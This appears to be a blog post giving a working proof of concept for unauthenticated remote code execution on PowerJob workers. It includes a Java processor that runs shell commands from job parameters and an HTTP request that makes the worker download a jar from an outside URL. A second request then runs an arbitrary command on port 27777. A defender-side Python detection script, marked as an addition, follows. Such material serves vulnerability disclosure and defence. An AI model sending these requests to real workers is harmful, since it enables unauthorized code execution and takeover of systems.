PowerJob Worker Unauthorized Remote Code Execution
The PowerJob worker has an unauthorized remote code execution vulnerability.
First, we build a jar containing the following code:
@Component
public class SimpleProcessor implements BasicProcessor {
    @Override
    public ProcessResult process(TaskContext taskContext) {
        OmsLogger omsLogger = taskContext.getOmsLogger();
        omsLogger.info("SimpleProcessor start to process, current JobParams is {}.", taskContext.getJobParams());
        String command = taskContext.getInstanceParams();
        ProcessBuilder builder = new ProcessBuilder();
        Process process = null;
        try {
            if (SystemUtils.IS_OS_WINDOWS) {
                process = builder.command("cmd.exe", "/c", command).redirectErrorStream(true).start();
            } else {
                process = builder.command("sh", "-c", command).redirectErrorStream(true).start();
            }
            InputStream inputStream = process.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
            String line;
            while ((line = reader.readLine()) != null) {
                omsLogger.info(line);
            }
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return new ProcessResult(true, "simple processor finished with params=" + command);
    }
}
Package the jar with the Maven package command. I have now packaged a malicious jar file:
java11 payload
java8 payload
Then send this request to the worker's port 27777:
POST /worker/deployContainer HTTP/1.1
content-type: application/json
Content-Length: 163
host: 172.16.27.29:27777

{"containerId":90,"containerName":"rce-demo","version":"bbb","downloadURL":"https://wiz-1251828685.cos.ap-shanghai.myqcloud.com/photos/4736658854a4f045e0ebfc72732ec779.jar"}
Now we can execute code with this request:
POST /worker/runJob HTTP/1.1
content-type: application/json
Content-Length: 550
host: 172.16.27.29:27777

{"allWorkerAddress":["172.16.27.29:27777"],"maxWorkerCount":0,"jobId":46,"wfInstanceId":null,"instanceId":520642210811609408,"executeType":"BROADCAST","processorType":"EXTERNAL","processorInfo":"90#org.example.demo.SimpleProcessor","instanceTimeoutMS":0,"jobParams":"","instanceParams":"open /System/Applications/Calculator.app","threadConcurrency":5,"taskRetryNum":1,"timeExpressionType":"API","timeExpression":null,"maxInstanceNum":0,"alarmConfig":"{\"alertThreshold\":0,\"silenceWindowLen\":0,\"statisticWindowLen\":0}","logConfig":"{\"type\":1}"}
After a few seconds, the command will be executed.
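A defender-side check for the two requests shown above, as an added example that is not part of the original post: it reviews requests captured on the worker port, flags /worker/deployContainer and /worker/runJob calls from unexpected sources, and links a runJob to a container whose jar came from an unexpected host. The trusted server address, the record layout and the sample traffic are assumptions constructed for illustration.

```python
import json
from urllib.parse import urlparse

# Assumed for this example (not from the post): the PowerJob server address,
# which is also taken to be the only legitimate source of container jars.
TRUSTED_SERVERS = {"172.16.27.10"}
WATCHED = {"/worker/deployContainer", "/worker/runJob"}

def review(records):
    """Flag suspicious (src_ip, path, json_body) records seen on the worker port."""
    suspect_containers, findings = set(), []
    for src_ip, path, body in records:
        if path not in WATCHED:
            continue
        if src_ip not in TRUSTED_SERVERS:
            findings.append(f"{path} from untrusted source {src_ip}")
        try:
            msg = json.loads(body)
        except (TypeError, ValueError):
            msg = None
        if not isinstance(msg, dict):
            findings.append(f"{path} with unparseable body from {src_ip}")
            continue
        if path == "/worker/deployContainer":
            host = urlparse(str(msg.get("downloadURL", ""))).hostname
            if host not in TRUSTED_SERVERS:
                suspect_containers.add(str(msg.get("containerId")))
                findings.append(f"container {msg.get('containerId')} jar from {host}")
        elif msg.get("processorType") == "EXTERNAL":
            # processorInfo is "<containerId>#<class name>", as in the post
            cid = str(msg.get("processorInfo", "")).split("#", 1)[0]
            if cid in suspect_containers:
                findings.append(f"runJob runs suspect container {cid}")
    return findings

# Constructed sample traffic, modelled on the two requests in the post.
SAMPLE = [
    ("172.16.27.10", "/worker/runJob",
     '{"jobId":1,"processorType":"BUILT_IN","processorInfo":"demo.Ok"}'),
    ("172.16.27.55", "/worker/deployContainer",
     '{"containerId":90,"containerName":"rce-demo","version":"bbb",'
     '"downloadURL":"https://files.example.net/p.jar"}'),
    ("172.16.27.55", "/worker/runJob",
     '{"jobId":46,"processorType":"EXTERNAL",'
     '"processorInfo":"90#org.example.demo.SimpleProcessor"}'),
]

if __name__ == "__main__":
    print(*review(SAMPLE), sep="\n")
```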
Link to this article:
/archives/63
Copyright notice:
Unless otherwise stated, all articles on this site are licensed under CC BY-NC-SA 4.0. Please credit TestNet when reposting.